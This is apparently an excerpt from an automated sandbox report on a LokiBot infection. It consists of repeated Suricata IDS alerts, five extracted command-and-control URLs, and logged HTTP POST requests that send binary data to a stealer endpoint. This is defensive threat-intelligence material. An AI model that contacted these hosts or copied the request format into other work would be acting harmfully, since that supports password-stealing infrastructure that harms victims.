                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55931 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55904
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55960
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49747
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55937 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55937 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55937 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55991 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:56000 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55936
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55972 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55970 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55914 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55916 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55916 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55931
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55980 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55909 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55945 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55957 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:56000 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55914
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55972 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49737
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55970 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49738
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55980 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55970 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55946 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55903
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55916 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55954
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55970 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55946 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55970 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55946 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55909 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55901 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55901 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55918
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55916 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:56000 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55938 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55937 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55949 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55912
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55915 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:56000 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55972 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:56000 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55899
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55909 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55972 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55946
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55939 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55939 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55901 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55966 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55916 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55937 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55910 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55949 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55963
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55937
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55929 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55980 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55915
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55965 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55939 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:56000
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55977 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55945
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55910 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55942 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55940
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55910 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55901 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55939 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55929 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55968
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55957 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55910 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55923 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55923 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55970
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55962 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55978 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55978 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55976 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55976 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55976 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55964 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55964 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55999 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55964 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55999 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55906 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55906 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:49749
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55964 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55973 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55973 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55901 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55973 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55916
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55949
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55905
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55957 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55910 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55966 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55966 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55938 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55909 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55962 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55948 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55962 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55948 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55948 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55977 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55962 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55964 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55962 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55939 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55911 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55973 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55901
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55950 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55978 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55999 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55991
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55910
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:55909 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.4:55980
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55906 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55976 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55978 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55965 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:55907 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55965 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55907 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55907 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55906 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:55911 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55965 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:55911 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:55948 -> 188.114.96.3:80
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: https://dddotx.shop/Mine/PWS/fre.php
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 176Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
                Source: global trafficHTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 149Connection: close
